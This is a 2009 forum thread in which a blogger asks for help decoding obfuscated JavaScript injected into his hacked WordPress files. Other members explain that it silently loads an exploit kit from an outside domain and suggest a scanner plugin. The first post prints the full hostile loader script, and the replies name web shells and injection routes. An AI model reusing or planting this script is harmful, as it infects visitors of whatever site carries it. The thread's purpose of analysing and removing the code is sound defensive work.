1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

My blog got hacked, help with decoding

Discussion in 'Blogging' started by prozium, May 9, 2009.

  1. prozium

    prozium Newbie

    Joined:
    Mar 31, 2009
    Messages:
    48
    Likes Received:
    12
    Hi there, this is my first thread here and i didn't want it to be something like this but, we can't get what we want ....
    So to the point - My blog(wordpres 2.5) got hacked, it was my hoster's fault. All my .php/.js/.xml files got edited (well not all of them, but most of them), the edition of ALL(in all folders - admin, plugins, themes and so on... ) the files took 2-3 minutes, so i'm assumig that he used a script of some kind.
    This code was inserted in most of the .php/.js/.xml files

    Code:
    </head><script language=javascript><!-- 
    (function(m9RlI){var HAspt='%';var UoQSJ=unescape(('var:20a:3d:22Scr:69p:74:45n:67ine:22:2cb:3d:22Versi:6fn:28)+:22:2cj:3d:22:22:2cu:3dnav:69ga:74or:2e:75serAg:65:6et:3bif((u:2eind:65xOf(:22W:69n:22):3e0):26:26:28:75:2eindexOf(:22:4eT:206:22):3c0):26:26(doc:75ment:2ecoo:6bie:2eind:65x:4ff:28:22:6d:69e:6b:3d1:22):3c:30):26:26(typ:65of(zr:76zts:29:21:3dtypeof(:22A:22:29):29:7b:7arvzts:3d:22A:22:3be:76al(:22if(win:64o:77:2e:22+a:2b:22)j:3dj+:22+:61+:22Major:22+b+a+:22Min:6fr:22+b:2ba+:22Build:22+b:2b:22j:3b:22):3bdo:63ument:2ewrite(:22:3c:73cri:70t:20s:72c:3d:2f:2fgu:6dblar:2ec:6e:2frs:73:2f:3f:69:64:3d:22+j+:22:3e:3c:5c:2fsc:72ipt:3e:22):3b:7d').replace(m9RlI,HAspt));eval(UoQSJ)})(/:/g);
     --></script>
    <body>
    It's some kind of redirecting script, that redirects to something (adware/spyware/virii), still not sure what. If there is someone who can help me decode it and understand what is it doing i will really appreciate any help.

    I can provide the php, that includes this code too if necessary.
     
  2. sidddd

    sidddd Power Member

    Joined:
    May 15, 2008
    Messages:
    749
    Likes Received:
    461
    sucks man.. download exploit scanner plugin and scan ur blog .. it will show the suspicious pages and provides a few instruction on how to remove the codes..

    My blog was hacked and this plugin helped me find those malicious code.. also google marked the blog as SITE IS HARMFUL.. so better do this RIGHT NOW...
     
  3. prozium

    prozium Newbie

    Joined:
    Mar 31, 2009
    Messages:
    48
    Likes Received:
    12
    First thing i did was to take the blog down, it was exposed only 3 hours. Thanks for the advise i will scan it with the plugin, but first the hoster must figure all how did his server got hacked. I want to decode the js, so i can find out who is doing this and what's the spin here.
     
  4. Ca$HHazard

    Ca$HHazard BANNED BANNED

    Joined:
    Feb 11, 2009
    Messages:
    171
    Likes Received:
    41
    The javascript injection on your pages is obfuscated iframe. Any user sent to your blog will be silently (and invisibly) redirected to a exploit kit. The kit will try inject shellcode onto the visitor, and thus infecting them.

    Could be a banking trojan, a standard bot for a botnet or some other random viri.

    You have a unupdated script that was on your shared/hosting public html directory. Unless you remove whatever is outdated and exploitable, it will continue to be infected. Via remote file inclusion or a SQL injection.

    All of the .php and or .html files was done in a second via a simple to make perl script. They had shell access to your site, probally a standard c99 or r57, it doesn't matter.

    Your AV was firing detections not at the viri it attempted to land on your box. But the recnizable shellcode.
    You dont really have to worry, they're most like scriptkiddies considering its REALLY easy to UD a exploit kit. Just get rid of the vulnerable script and youl be fine.
     
    • Thanks Thanks x 2
    Last edited: May 9, 2009